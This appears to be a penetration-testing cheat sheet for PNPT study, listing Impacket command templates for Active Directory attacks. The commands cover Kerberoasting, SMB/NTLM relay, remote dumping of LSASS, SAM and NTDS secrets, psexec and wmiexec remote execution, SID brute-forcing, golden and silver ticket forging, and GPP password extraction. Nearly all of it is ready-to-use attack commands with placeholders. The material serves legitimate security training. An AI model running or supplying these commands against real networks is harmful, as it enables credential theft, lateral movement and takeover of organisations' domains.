Kerberoasting (GetUserSPNs.py)
Perform Kerberoasting by requesting service tickets (TGS) for accounts with SPNs.
impacket-GetUserSPNs -dc-ip {{dc_ip}} {{domain}}/{{user}}:{{password}} -requestSMB Relay Attack (ntlmrelayx.py)
Listen for incoming NTLM authentication requests and relay them to target systems.
impacket-ntlmrelayx -tf {{targets_file}} -smb2support -socksCredential Dumping (secretsdump.py)
Remotely dump hashes from LSASS, SAM, and LSA secrets, or extract the NTDS.dit file.
impacket-secretsdump {{domain}}/{{user}}:{{password}}@{{target}}
impacket-secretsdump -k {{target}} # Using Kerberos (ticket required)Remote Command Execution (psexec.py / wmiexec.py)
Execute commands on a target system using SMB or WMI, typically requiring administrative privileges.
impacket-psexec {{domain}}/{{user}}:{{password}}@{{target}}
impacket-wmiexec {{domain}}/{{user}}:{{password}}@{{target}}RID Enumeration (lookupsid.py)
Enumerate users through SID brute-forcing on systems where you have basic authentication.
impacket-lookupsid {{domain}}/{{user}}:{{password}}@{{target}}Pass-the-Ticket (ticketer.py)
Generate a Golden or Silver ticket to gain persistent or elevated access.
impacket-ticketer -nthash {{ntlm_hash}} -domain-sid {{domain_sid}} -domain {{domain}} {{target_user}}GPP Password Extraction (Get-GPPPassword.py)
Extract passwords stored in Group Policy Preferences (GPP) from the SYSVOL share.
impacket-Get-GPPPassword {{domain}}/{{user}}:{{password}}@{{dc_ip}}Description
Impacket is a collection of Python classes for working with network protocols. In PNPT, Impacket’s example scripts are essential for carrying out advanced Active Directory attacks such as Kerberoasting, SMB relaying, and credential dumping from the NTDS database or local system.